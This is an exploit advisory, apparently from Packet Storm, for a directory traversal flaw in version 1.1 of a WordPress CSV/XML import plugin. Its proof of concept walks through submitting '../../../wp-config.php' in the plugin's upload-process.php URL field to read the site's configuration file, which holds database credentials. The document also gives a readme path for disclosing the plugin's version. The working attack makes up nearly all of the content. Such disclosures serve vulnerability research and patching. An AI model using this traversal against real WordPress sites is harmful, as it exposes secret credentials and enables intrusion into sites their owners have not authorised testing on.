WordPress Import CSV 1.1 Directory Traversal

2016-03-21T00:00:00
ID PACKETSTORM:136320
Type packetstorm
Reporter Wadeek
Modified 2016-03-21T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Import CSV | Directory Traversal  
# Exploit Author: Wadeek  
# Website Author: https://github.com/Wad-Deek  
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip  
# Stable Tag: 1.1  
# Tested on: Xampp on Windows7  
  
[Version Disclosure]  
======================================  
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt  
======================================  
  
[PoC]  
======================================  
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.  
Click on the link "From an url".  
In "URL" field to write "../../../wp-config.php".  
Validate form and inspect the body.  
======================================  
  
`